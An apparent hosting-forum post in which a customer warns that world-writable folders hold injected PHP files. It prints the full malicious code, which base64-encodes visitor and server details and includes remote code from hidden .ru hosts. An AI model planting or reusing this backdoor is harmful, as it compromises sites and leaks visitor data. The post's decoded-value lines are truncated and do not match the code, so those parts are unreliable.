Hello,
I already submited this to Surapss security.
There is a mayor problem with server security. All folders with write permissions (777) have malicious PHP code in them.
Usually they are called contact.php, download.php and other.
It consists of this code:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_en code($b).".".base64_encode($c).".".base64_encode($ d).".".base64_encode($e).".".base64_encode($f)."." .base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_dec ode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_deco de("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
The base64 encodes values are as follows:
"aHR0cDovLw==" is "http://"
"dXNlcjUucGhwc3VwcG9ydC5ydQ
"dXNlcjUucGhwc3VwcG9ydC5ydQ
Those files are in EVERY folder with 777 permission.
You can read about it in-depth here:
http://forums.asmallorange.com/lofiv...php/t5815.html
This DOES effect Surpass accounts.
Check your folders!!
vexcity.com
pass40